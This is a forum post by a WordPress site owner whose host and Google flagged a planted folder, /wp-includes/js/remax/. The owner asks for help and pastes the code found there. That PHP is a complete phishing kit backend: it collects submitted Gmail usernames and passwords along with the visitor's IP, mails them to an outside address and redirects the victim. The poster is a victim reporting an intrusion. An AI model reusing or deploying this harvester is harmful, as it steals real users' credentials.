Google is not as bad as it seems
Hostgator didnt even bother.
Sent me an email today warning i had a folder installed into /wp-includes/js/remax/
I don't know how it got there but G suggested to clean the site and change file permissions.
I called hostgator, will see what they think. May be its a known error.
Google also said once you have taken all these measures re-submit the site here
Anyone had experienced such code before?
Here what the code looks like and there is one for every popular email provider.
I also have received some weird emails coming from emails that looked exactly the same as mine. Chekced the header they were made to look the same.
Is there anyway i can track where it came from?
Sent me an email today warning i had a folder installed into /wp-includes/js/remax/
I don't know how it got there but G suggested to clean the site and change file permissions.
I called hostgator, will see what they think. May be its a known error.
Google also said once you have taken all these measures re-submit the site here
HTML:
http://www.google.com/safebrowsing/report_error/?tpl=emailer
Anyone had experienced such code before?
Here what the code looks like and there is one for every popular email provider.
I also have received some weird emails coming from emails that looked exactly the same as mine. Chekced the header they were made to look the same.
PHP:
<?php
session_start();
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");
$message .= "-------- UserID ------------------------------\n";
$message .= "UserID: ".$_POST['gmailuser']."\n";
$message .= "Password: ".$_POST['gmailpassword']."\n";
$message .= "======================================\n";
$message .= "IP: ".$ip."\n";
$message .= "Date: ".$adddate."\n";
$message .= "--------Created By Wire Wizard------------------------------\n";
$recipient = "[email protected]";
$subject = "Gmail - Created By Cheikh";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: http://www.remax.com/");
}
?>Wizard
Is there anyway i can track where it came from?